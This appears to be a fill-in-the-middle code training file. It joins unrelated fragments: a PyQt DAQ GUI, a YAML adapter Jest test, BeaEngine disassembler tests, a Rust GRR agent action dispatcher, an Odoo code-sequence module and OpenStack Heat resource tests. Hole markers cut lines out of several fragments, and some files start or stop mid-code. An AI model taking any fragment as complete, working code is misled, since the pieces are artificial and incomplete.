for ch in self._DAQCmd:
if self._DAQCmd[ch].get('recordInit', False):
# if 'recordInit' in self._DAQCmd[ch] and self._DAQCmd[ch]['recordInit']:
dirHandle.setInfo({(self.dev.name(), ch): self.initialState[ch]})
class DAQDevGui(Qt.QWidget):
def __init__(self, dev):
self.dev = dev
Qt.QWidget.__init__(self)
self.layout = Qt.QVBoxLayout()
self.setLayout(self.layout)
chans = self.dev.listChannels()
self.widgets = {}
# self.uis = {}
self.defaults = {}
for ch in chans:
wid = Qt.QWidget()
ui = Ui_Form()
ui.setupUi(wid)
self.layout.addWidget(wid)
ui.analogCtrls = [ui.scaleDefaultBtn, ui.scaleSpin, ui.offsetDefaultBtn, ui.offsetSpin, ui.scaleLabel,
ui.offsetLabel]
# ui.channel = ch
for s in dir(ui):
i = getattr(ui, s)
if isinstance(i, Qt.QWidget):
i.channel = ch
self.widgets[ch] = ui
ui.nameLabel.setText(str(ch))
ui.channelCombo.addItem("%s (%s)" % (ch, chans[ch]['channel']))
holding = chans[ch].get('holding', 0)
if chans[ch]['type'] in ['ao', 'ai']:
ui.inputRadio.setEnabled(False)
ui.outputRadio.setEnabled(False)
ui.invertCheck.hide()
scale = chans[ch].get('scale', 1)
units = chans[ch].get('units', 'V')
offset = chans[ch].get('offset', 0)
ui.offsetSpin.setOpts(suffix='V', siPrefix=True, dec=True, step=1.0, minStep=1e-4)
ui.offsetSpin.setValue(offset)
ui.offsetSpin.sigValueChanged.connect(self.offsetSpinChanged)
ui.offsetDefaultBtn.setText("Default (%s)" % siFormat(offset, suffix='V'))
ui.offsetDefaultBtn.clicked.connect(self.offsetDefaultBtnClicked)
if chans[ch]['type'] == 'ao':
ui.outputRadio.setChecked(True)
ui.scaleDefaultBtn.setText("Default (%s)" % siFormat(scale, suffix='V/' + units))
ui.scaleSpin.setOpts(suffix='V/' + units, siPrefix=True, dec=True, step=1.0, minStep=1e-9)
ui.holdingSpin.setOpts(suffix=units, siPrefix=True, step=0.01)
ui.holdingSpin.setValue(holding)
ui.holdingSpin.sigValueChanged.connect(self.holdingSpinChanged)
elif chans[ch]['type'] == 'ai':
ui.inputRadio.setChecked(True)
ui.holdingLabel.hide()
ui.holdingSpin.hide()
ui.scaleDefaultBtn.setText("Default (%s)" % siFormat(scale, suffix=units + '/V'))
# ui.scaleDefaultBtn.clicked.connect(self.scaleDefaultBtnClicked)
ui.scaleSpin.setOpts(suffix=units + '/V', siPrefix=True, dec=True)
ui.scaleSpin.setValue(scale)
ui.scaleDefaultBtn.clicked.connect(self.scaleDefaultBtnClicked)
ui.scaleSpin.sigValueChanged.connect(self.scaleSpinChanged)
self.defaults[ch] = {
'scale': scale,
'offset': offset}
elif chans[ch]['type'] in ['do', 'di']:
for item in ui.analogCtrls:
item.hide()
if chans[ch].get('invert', False):
ui.invertCheck.setChecked(True)
if chans[ch]['type'] == 'do':
ui.outputRadio.setChecked(True)
ui.holdingSpin.setOpts(bounds=[0, 1], step=1)
ui.holdingSpin.setValue(holding)
ui.holdingSpin.sigValueChanged.connect(self.holdingSpinChanged)
elif chans[ch]['type'] == 'di':
ui.inputRadio.setChecked(True)
ui.holdingLabel.hide()
ui.holdingSpin.hide()
ui.invertCheck.toggled.connect(self.invertToggled)
# Qt.QObject.connect(self.dev, Qt.SIGNAL('holdingChanged'), self.holdingChanged)
self.dev.sigHoldingChanged.connect(self.holdingChanged)
def holdingChanged(self, ch, val):
self.widgets[ch].holdingSpin.blockSignals(True)
self.widgets[ch].holdingSpin.setValue(val)
self.widgets[ch].holdingSpin.blockSignals(False)
def holdingSpinChanged(self, spin):
ch = spin.channel
self.dev.setChanHolding(ch, spin.value(), block=False)
def scaleSpinChanged(self, spin):
ch = spin.channel
self.dev.setChanScale(ch, spin.value(), block=False)
def offsetSpinChanged(self, spin):
ch = spin.channel
self.dev.setChanOffset(ch, spin.value(), block=False)
def offsetDefaultBtnClicked(self):
ch = self.sender().channel
self.widgets[ch].offsetSpin.setValue(self.defaults[ch]['offset'])
def scaleDefaultBtnClicked(self):
ch = self.sender().channel
self.widgets[ch].scaleSpin.setValue(self.defaults[ch]['scale'])
def invertToggled(self, b):
ch = self.sender().channel
if b:
self.dev.setChanScale(ch, -1, update=False)
self.dev.setChanOffset(ch, 1)
else:
self.dev.setChanScale(ch, 1, update=False)
self.dev.setChanOffset(ch, 0)<|fim▁end|>
|
chans = [chans]
for ch in chans:
|
<|file_name|>yml-test.js<|end_file_name|><|fim▁begin|>/**
* Copyright IBM Corp. 2020, 2020
*
* This source code is licensed under the Apache-2.0 license found in the
* LICENSE file in the root directory of this source tree.
*
* @jest-environment node
*/
'use strict';
describe('yml', () => {
let vol;
let adapter;
beforeEach(() => {
jest.mock('fs', () => {
const memfs = require('memfs');
vol = memfs.vol;
return memfs.fs;
});
adapter = require('../yml');
});
afterEach(() => {
vol.reset();
});
it('should read a filepath and return its content as a value', async () => {
const data = { foo: 'bar' };
vol.fromJSON({
'/test.yml': adapter.serialize(data),
});
const result = await adapter.read('/', 'test');
expect(result).toEqual(data);
});
it('should write the given data as yml to the given filepath', async () => {
const data = { foo: 'bar' };
await adapter.write('/', 'test', data);
const result = await adapter.read('/', 'test');
expect(result).toEqual(data);
});
it('should throw if the file its trying to read from does not exist', async () => {
await expect(
adapter.read('/', 'test')
).rejects.toThrowErrorMatchingInlineSnapshot(
`"Unable to find extension \`test\` at filepath: /test.yml. Either create the file or update the extension to be computed."`
);
});<|fim▁hole|> it('should throw if the given data is invalid yml', async () => {
await expect(
adapter.write('/', 'test', { data: undefined })
).rejects.toThrow();
});
});<|fim▁end|>
| |
<|file_name|>0f3a25.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
# -*- coding: utf-8 -*-
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
# @author : beaengine@gmail.com
from headers.BeaEnginePython import *
from nose.tools import *
class TestSuite:
def test(self):
# EVEX.256.66.0F3A.W0 25 /r ib
# vpternlogd ymm1{k1}{z}, ymm2, ymm3/m256/m32bcst, imm8
myEVEX = EVEX('EVEX.256.66.0F3A.W0')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogd')
assert_equal(myDisasm.repr(), 'vpternlogd ymm28, ymm16, ymmword ptr [r8], 11h')
# EVEX.512.66.0F3A.W0 25 /r ib
# vpternlogd zmm1{k1}{z}, zmm2, zmm3/m512/m32bcst, imm8
myEVEX = EVEX('EVEX.512.66.0F3A.W0')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogd')
assert_equal(myDisasm.repr(), 'vpternlogd zmm28, zmm16, zmmword ptr [r8], 11h')
# EVEX.256.66.0F3A.W1 25 /r ib
# vpternlogq ymm1{k1}{z}, ymm2, ymm3/m256/m64bcst, imm8
myEVEX = EVEX('EVEX.256.66.0F3A.W1')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogq')
assert_equal(myDisasm.repr(), 'vpternlogq ymm28, ymm16, ymmword ptr [r8], 11h')
# EVEX.512.66.0F3A.W1 25 /r ib
# vpternlogq zmm1{k1}{z}, zmm2, zmm3/m512/m64bcst, imm8
myEVEX = EVEX('EVEX.512.66.0F3A.W1')
Buffer = bytes.fromhex('{}252011'.format(myEVEX.prefix()))
myDisasm = Disasm(Buffer)
myDisasm.read()
assert_equal(myDisasm.infos.Instruction.Opcode, 0x25)
assert_equal(myDisasm.infos.Instruction.Mnemonic, b'vpternlogq')<|fim▁hole|><|fim▁end|>
|
assert_equal(myDisasm.repr(), 'vpternlogq zmm28, zmm16, zmmword ptr [r8], 11h')
|
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>// Copyright 2020 Google LLC
//
// Use of this source code is governed by an MIT-style license that can be found
// in the LICENSE file or at https://opensource.org/licenses/MIT.
//! Handlers and types for agent's actions.
//!
//! The basic functionality that a GRR agent exposes is called an _action_.
//! Actions are invoked by the server (when running a _flow_), should gather
//! requested information and report back to the server.
//!
//! In RRG each action consists of three components: a request type, a response
//! type and an action handler. Request and response types wrap lower-level
//! Protocol Buffer messages sent by and to the GRR server. Handlers accept one
//! instance of the corresponding request type and send some (zero or more)
//! instances of the corresponding response type.
#[cfg(target_os = "linux")]
pub mod filesystems;
#[cfg(target_family = "unix")]
pub mod interfaces;
pub mod metadata;
pub mod startup;
pub mod listdir;
pub mod timeline;
pub mod network;<|fim▁hole|>pub mod memsize;
pub mod finder;
use crate::session::{self, Session, Task};
/// Abstraction for action-specific requests.
///
/// Protocol Buffer messages received from the GRR server are not necessarily
/// easy to work with and are hardly idiomatic to Rust. For this reason, actions
/// should define more structured data types to represent their input and should
/// be able to parse raw messages into them.
pub trait Request: Sized {
/// A type of the corresponding raw proto message.
type Proto: prost::Message + Default;
/// A method for converting raw proto messages into structured requests.
fn from_proto(proto: Self::Proto) -> Result<Self, session::ParseError>;
}
/// Abstraction for action-specific responses.
///
/// Like with the [`Request`] type, Protocol Buffer messages sent to the GRR
/// server are very idiomatic to Rust. For this reason, actions should define
/// more structured data types to represent responses and provide a way to
/// convert them into the wire format.
///
/// Note that because of the design flaws in the protocol, actions also need to
/// specify a name of the wrapper RDF class from the Python implementation.
/// Hopefully, one day this issue would be fixed and class names will not leak
/// into the specification.
///
/// [`Request`]: trait.Request.html
pub trait Response: Sized {
/// A name of the corresponding RDF class.
const RDF_NAME: Option<&'static str>;
/// A type of the corresponding raw proto message.
type Proto: prost::Message + Default;
/// A method for converting structured responses into raw proto messages.
fn into_proto(self) -> Self::Proto;
}
impl Request for () {
type Proto = ();
fn from_proto(unit: ()) -> Result<(), session::ParseError> {
Ok(unit)
}
}
impl Response for () {
const RDF_NAME: Option<&'static str> = None;
type Proto = ();
fn into_proto(self) {
}
}
/// Dispatches `task` to a handler appropriate for the given `action`.
///
/// This method is a mapping between action names (as specified in the protocol)
/// and action handlers (implemented on the agent).
///
/// If the given action is unknown (or not yet implemented), this function will
/// return an error.
pub fn dispatch<'s, S>(action: &str, task: Task<'s, S>) -> session::Result<()>
where
S: Session,
{
match action {
"SendStartupInfo" => task.execute(self::startup::handle),
"GetClientInfo" => task.execute(self::metadata::handle),
"ListDirectory" => task.execute(self::listdir::handle),
"Timeline" => task.execute(self::timeline::handle),
"ListNetworkConnections" => task.execute(self::network::handle),
"GetFileStat" => task.execute(self::stat::handle),
"GetInstallDate" => task.execute(self::insttime::handle),
#[cfg(target_family = "unix")]
"EnumerateInterfaces" => task.execute(self::interfaces::handle),
#[cfg(target_os = "linux")]
"EnumerateFilesystems" => task.execute(self::filesystems::handle),
"GetMemorySize" => task.execute(self::memsize::handle),
action => return Err(session::Error::Dispatch(String::from(action))),
}
}<|fim▁end|>
|
pub mod stat;
pub mod insttime;
|
<|file_name|>clv_patient_category_seq.py<|end_file_name|><|fim▁begin|># -*- encoding: utf-8 -*-
################################################################################
# #
# Copyright (C) 2013-Today Carlos Eduardo Vercelino - CLVsol #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as published by #
# the Free Software Foundation, either version 3 of the License, or #
# (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
################################################################################
from openerp import models, fields, api
def format_code(code_seq):
code = map(int, str(code_seq))
code_len = len(code)
while len(code) < 14:
code.insert(0, 0)
while len(code) < 16:
n = sum([(len(code) + 1 - i) * v for i, v in enumerate(code)]) % 11
if n > 1:
f = 11 - n
else:
f = 0
code.append(f)
code_str = "%s.%s.%s.%s.%s-%s" % (str(code[0]) + str(code[1]),
str(code[2]) + str(code[3]) + str(code[4]),
str(code[5]) + str(code[6]) + str(code[7]),
str(code[8]) + str(code[9]) + str(code[10]),
str(code[11]) + str(code[12]) + str(code[13]),
str(code[14]) + str(code[15]))
if code_len <= 3:
code_form = code_str[18 - code_len:21]
elif code_len > 3 and code_len <= 6:
code_form = code_str[17 - code_len:21]
elif code_len > 6 and code_len <= 9:
code_form = code_str[16 - code_len:21]
elif code_len > 9 and code_len <= 12:<|fim▁hole|> code_form = code_str[15 - code_len:21]
elif code_len > 12 and code_len <= 14:
code_form = code_str[14 - code_len:21]
return code_form
class clv_patient_category(models.Model):
_inherit = 'clv_patient.category'
code = fields.Char('Category Code', size=64, select=1, required=False, readonly=False, default='/',
help='Use "/" to get an automatic new Category Code.')
@api.model
def create(self, vals):
if not 'code' in vals or ('code' in vals and vals['code'] == '/'):
code_seq = self.pool.get('ir.sequence').get(self._cr, self._uid, 'clv_patient.category.code')
vals['code'] = format_code(code_seq)
return super(clv_patient_category, self).create(vals)
@api.multi
def write(self, vals):
if 'code' in vals and vals['code'] == '/':
code_seq = self.pool.get('ir.sequence').get(self._cr, self._uid, 'clv_patient.category.code')
vals['code'] = format_code(code_seq)
return super(clv_patient_category, self).write(vals)
@api.one
def copy(self, default=None):
default = dict(default or {})
default.update({'code': '/',})
return super(clv_patient_category, self).copy(default)<|fim▁end|>
| |
<|file_name|>test_stack_resources.py<|end_file_name|><|fim▁begin|># Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from oslo_config import cfg
from oslo_messaging.rpc import dispatcher
import six
from heat.common import exception
from heat.common import identifier
from heat.engine.clients.os import keystone
from heat.engine import dependencies
from heat.engine import resource as res
from heat.engine import service
from heat.engine import stack
from heat.engine import stack_lock
from heat.engine import template as templatem
from heat.objects import stack as stack_object
from heat.tests import common
from heat.tests.engine import tools
from heat.tests import fakes as test_fakes
from heat.tests import generic_resource as generic_rsrc
from heat.tests import utils
policy_template = '''
{
"AWSTemplateFormatVersion" : "2010-09-09",
"Description" : "alarming",
"Resources" : {
"WebServerScaleDownPolicy" : {
"Type" : "AWS::AutoScaling::ScalingPolicy",
"Properties" : {
"AdjustmentType" : "ChangeInCapacity",
"AutoScalingGroupName" : "",
"Cooldown" : "60",
"ScalingAdjustment" : "-1"
}
},
"Random" : {
"Type" : "OS::Heat::RandomString"
}
}
}
'''
class StackResourcesServiceTest(common.HeatTestCase):
def setUp(self):
super(StackResourcesServiceTest, self).setUp()
self.ctx = utils.dummy_context(tenant_id='stack_resource_test_tenant')
self.eng = service.EngineService('a-host', 'a-topic')
self.eng.thread_group_mgr = tools.DummyThreadGroupManager()
self.eng.engine_id = 'engine-fake-uuid'
cfg.CONF.set_default('heat_stack_user_role', 'stack_user_role')
@mock.patch.object(stack.Stack, 'load')
def _test_describe_stack_resource(self, mock_load):
mock_load.return_value = self.stack
# Patch _resolve_all_attributes or it tries to call novaclient
self.patchobject(res.Resource, '_resolve_all_attributes',
return_value=None)
r = self.eng.describe_stack_resource(self.ctx, self.stack.identifier(),
'WebServer', with_attr=None)
self.assertIn('resource_identity', r)
self.assertIn('description', r)
self.assertIn('updated_time', r)
self.assertIn('stack_identity', r)
self.assertIsNotNone(r['stack_identity'])
self.assertIn('stack_name', r)
self.assertEqual(self.stack.name, r['stack_name'])
self.assertIn('metadata', r)
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertIn('attributes', r)
self.assertEqual('WebServer', r['resource_name'])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@tools.stack_context('service_stack_resource_describe__test_stack')
def test_stack_resource_describe(self):
self._test_describe_stack_resource()
@mock.patch.object(service.EngineService, '_get_stack')
def test_stack_resource_describe_nonexist_stack(self, mock_get):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
mock_get.side_effect = exception.EntityNotFound(
entity='Stack', name='test')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, non_exist_identifier, 'WebServer')
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
mock_get.assert_called_once_with(self.ctx, non_exist_identifier)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resource_describe_nonexist_test_stack')
def test_stack_resource_describe_nonexist_resource(self, mock_load):
mock_load.return_value = self.stack
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, self.stack.identifier(), 'foo')
self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@tools.stack_context('service_resource_describe_noncreated_test_stack',
create_res=False)
def test_stack_resource_describe_noncreated_resource(self):
self._test_describe_stack_resource()
@mock.patch.object(service.EngineService, '_authorize_stack_user')
@tools.stack_context('service_resource_describe_user_deny_test_stack')
def test_stack_resource_describe_stack_user_deny(self, mock_auth):
self.ctx.roles = [cfg.CONF.heat_stack_user_role]
mock_auth.return_value = False
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resource,
self.ctx, self.stack.identifier(), 'foo')
self.assertEqual(exception.Forbidden, ex.exc_info[0])
mock_auth.assert_called_once_with(self.ctx, mock.ANY, 'foo')
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_describe_test_stack')
def test_stack_resources_describe(self, mock_load):
mock_load.return_value = self.stack
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
'WebServer')
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_identity', r)
self.assertIn('description', r)
self.assertIn('updated_time', r)
self.assertIn('stack_identity', r)
self.assertIsNotNone(r['stack_identity'])
self.assertIn('stack_name', r)
self.assertEqual(self.stack.name, r['stack_name'])
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_describe_no_filter_test_stack')
def test_stack_resources_describe_no_filter(self, mock_load):
mock_load.return_value = self.stack
resources = self.eng.describe_stack_resources(
self.ctx, self.stack.identifier(), None)
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@mock.patch.object(service.EngineService, '_get_stack')
def test_stack_resources_describe_bad_lookup(self, mock_get):
mock_get.side_effect = TypeError
self.assertRaises(TypeError,
self.eng.describe_stack_resources,
self.ctx, None, 'WebServer')
mock_get.assert_called_once_with(self.ctx, None)
def test_stack_resources_describe_nonexist_stack(self):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.describe_stack_resources,
self.ctx, non_exist_identifier, 'WebServer')
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
@tools.stack_context('find_phys_res_stack')
def test_find_physical_resource(self):
resources = self.eng.describe_stack_resources(self.ctx,
self.stack.identifier(),
None)
phys_id = resources[0]['physical_resource_id']
result = self.eng.find_physical_resource(self.ctx, phys_id)
self.assertIsInstance(result, dict)
resource_identity = identifier.ResourceIdentifier(**result)
self.assertEqual(self.stack.identifier(), resource_identity.stack())
self.assertEqual('WebServer', resource_identity.resource_name)
def test_find_physical_resource_nonexist(self):
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.find_physical_resource,
self.ctx, 'foo')
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_list(self, mock_load):
mock_load.return_value = self.stack
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier())
self.assertEqual(1, len(resources))
r = resources[0]
self.assertIn('resource_identity', r)
self.assertIn('updated_time', r)
self.assertIn('physical_resource_id', r)
self.assertIn('resource_name', r)
self.assertEqual('WebServer', r['resource_name'])
self.assertIn('resource_status', r)
self.assertIn('resource_status_reason', r)
self.assertIn('resource_type', r)
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_depth')
def test_stack_resources_list_with_depth(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
2)
self.stack.iter_resources.assert_called_once_with(2,
filters=None)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack_with_max_depth')
def test_stack_resources_list_with_max_depth(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
99)
max_depth = cfg.CONF.max_nested_stack_depth
self.stack.iter_resources.assert_called_once_with(max_depth,
filters=None)
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_filter_type(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
filters = {'type': 'AWS::EC2::Instance'}
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
filters=filters)
self.stack.iter_resources.assert_called_once_with(
0, filters={})
self.assertIn('AWS::EC2::Instance', resources[0]['resource_type'])
@mock.patch.object(stack.Stack, 'load')
@tools.stack_context('service_resources_list_test_stack')
def test_stack_resources_filter_type_not_found(self, mock_load):
mock_load.return_value = self.stack
resources = six.itervalues(self.stack)
self.stack.iter_resources = mock.Mock(return_value=resources)
filters = {'type': 'NonExisted'}
resources = self.eng.list_stack_resources(self.ctx,
self.stack.identifier(),
filters=filters)
self.stack.iter_resources.assert_called_once_with(
0, filters={})
self.assertEqual(0, len(resources))
@mock.patch.object(stack.Stack, 'load')
def test_stack_resources_list_deleted_stack(self, mock_load):
stk = tools.setup_stack('resource_list_deleted_stack', self.ctx)
stack_id = stk.identifier()
mock_load.return_value = stk
tools.clean_up_stack(stk)
resources = self.eng.list_stack_resources(self.ctx, stack_id)
self.assertEqual(1, len(resources))
res = resources[0]
self.assertEqual('DELETE', res['resource_action'])
self.assertEqual('COMPLETE', res['resource_status'])
@mock.patch.object(service.EngineService, '_get_stack')
def test_stack_resources_list_nonexist_stack(self, mock_get):
non_exist_identifier = identifier.HeatIdentifier(
self.ctx.tenant_id, 'wibble',
'18d06e2e-44d3-4bef-9fbf-52480d604b02')
mock_get.side_effect = exception.EntityNotFound(entity='Stack',
name='test')
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.list_stack_resources,
self.ctx, non_exist_identifier)
self.assertEqual(exception.EntityNotFound, ex.exc_info[0])
mock_get.assert_called_once_with(self.ctx, non_exist_identifier,
show_deleted=True)
def _stack_create(self, stack_name):
self.patchobject(keystone.KeystoneClientPlugin, '_create',
return_value=test_fakes.FakeKeystoneClient())
stk = tools.get_stack(stack_name, self.ctx, policy_template)
stk.store()
stk.create()
s = stack_object.Stack.get_by_id(self.ctx, stk.id)
self.patchobject(service.EngineService, '_get_stack', return_value=s)
return stk
def test_signal_reception_async(self):
self.eng.thread_group_mgr = tools.DummyThreadGroupMgrLogStart()
stack_name = 'signal_reception_async'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data)
self.assertEqual([(self.stack.id, mock.ANY)],
self.eng.thread_group_mgr.started)
@mock.patch.object(res.Resource, 'signal')
def test_signal_reception_sync(self, mock_signal):
mock_signal.return_value = None
stack_name = 'signal_reception_sync'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data,
sync_call=True)
mock_signal.assert_called_once_with(mock.ANY, False)
def test_signal_reception_no_resource(self):
stack_name = 'signal_reception_no_resource'
self.stack = self._stack_create(stack_name)
test_data = {'food': 'yum'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal, self.ctx,
dict(self.stack.identifier()),
'resource_does_not_exist',
test_data)
self.assertEqual(exception.ResourceNotFound, ex.exc_info[0])
@mock.patch.object(stack.Stack, 'load')
@mock.patch.object(service.EngineService, '_get_stack')
def test_signal_reception_unavailable_resource(self, mock_get, mock_load):
stack_name = 'signal_reception_unavailable_resource'
stk = tools.get_stack(stack_name, self.ctx, policy_template)
stk.store()
self.stack = stk
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
mock_load.return_value = stk
mock_get.return_value = s
test_data = {'food': 'yum'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal, self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
test_data)
self.assertEqual(exception.ResourceNotAvailable, ex.exc_info[0])
mock_load.assert_called_once_with(self.ctx, stack=mock.ANY,
use_stored_context=mock.ANY)
mock_get.assert_called_once_with(self.ctx, self.stack.identifier())
@mock.patch.object(res.Resource, 'signal')
def test_signal_returns_metadata(self, mock_signal):
mock_signal.return_value = None
self.stack = self._stack_create('signal_reception')
rsrc = self.stack['WebServerScaleDownPolicy']
test_metadata = {'food': 'yum'}
rsrc.metadata_set(test_metadata)
md = self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
self.assertEqual(test_metadata, md)
mock_signal.assert_called_once_with(mock.ANY, False)
def test_signal_unset_invalid_hook(self):
self.stack = self._stack_create('signal_unset_invalid_hook')
details = {'unset_hook': 'invalid_hook'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal,
self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
details)
msg = 'Invalid hook type "invalid_hook"'
self.assertIn(msg, six.text_type(ex.exc_info[1]))
self.assertEqual(exception.InvalidBreakPointHook,
ex.exc_info[0])
def test_signal_unset_not_defined_hook(self):
self.stack = self._stack_create('signal_unset_not_defined_hook')
details = {'unset_hook': 'pre-update'}
ex = self.assertRaises(dispatcher.ExpectedException,
self.eng.resource_signal,
self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy',
details)
msg = ('The "pre-update" hook is not defined on '
'AWSScalingPolicy "WebServerScaleDownPolicy"')
self.assertIn(msg, six.text_type(ex.exc_info[1]))
self.assertEqual(exception.InvalidBreakPointHook,
ex.exc_info[0])<|fim▁hole|> def test_signal_calls_metadata_update(self, mock_get, mock_signal,
mock_update):
# fake keystone client
self.patchobject(keystone.KeystoneClientPlugin, '_create',
return_value=test_fakes.FakeKeystoneClient())
stk = tools.get_stack('signal_reception', self.ctx, policy_template)
self.stack = stk
stk.store()
stk.create()
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
mock_get.return_value = s
mock_signal.return_value = True
# this will be called once for the Random resource
mock_update.return_value = None
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
mock_get.assert_called_once_with(self.ctx, self.stack.identifier())
mock_signal.assert_called_once_with(mock.ANY, False)
mock_update.assert_called_once_with()
@mock.patch.object(res.Resource, 'metadata_update')
@mock.patch.object(res.Resource, 'signal')
@mock.patch.object(service.EngineService, '_get_stack')
def test_signal_no_calls_metadata_update(self, mock_get, mock_signal,
mock_update):
# fake keystone client
self.patchobject(keystone.KeystoneClientPlugin, '_create',
return_value=test_fakes.FakeKeystoneClient())
stk = tools.get_stack('signal_reception', self.ctx, policy_template)
self.stack = stk
stk.store()
stk.create()
s = stack_object.Stack.get_by_id(self.ctx, self.stack.id)
mock_get.return_value = s
mock_signal.return_value = False
self.eng.resource_signal(self.ctx,
dict(self.stack.identifier()),
'WebServerScaleDownPolicy', None,
sync_call=True)
mock_get.assert_called_once_with(self.ctx, self.stack.identifier())
mock_signal.assert_called_once_with(mock.ANY, False)
# this will never be called
self.assertEqual(0, mock_update.call_count)
def test_lazy_load_resources(self):
stack_name = 'lazy_load_test'
lazy_load_template = {
'HeatTemplateFormatVersion': '2012-12-12',
'Resources': {
'foo': {'Type': 'GenericResourceType'},
'bar': {
'Type': 'ResourceWithPropsType',
'Properties': {
'Foo': {'Ref': 'foo'},
}
}
}
}
templ = templatem.Template(lazy_load_template)
stk = stack.Stack(self.ctx, stack_name, templ)
self.assertIsNone(stk._resources)
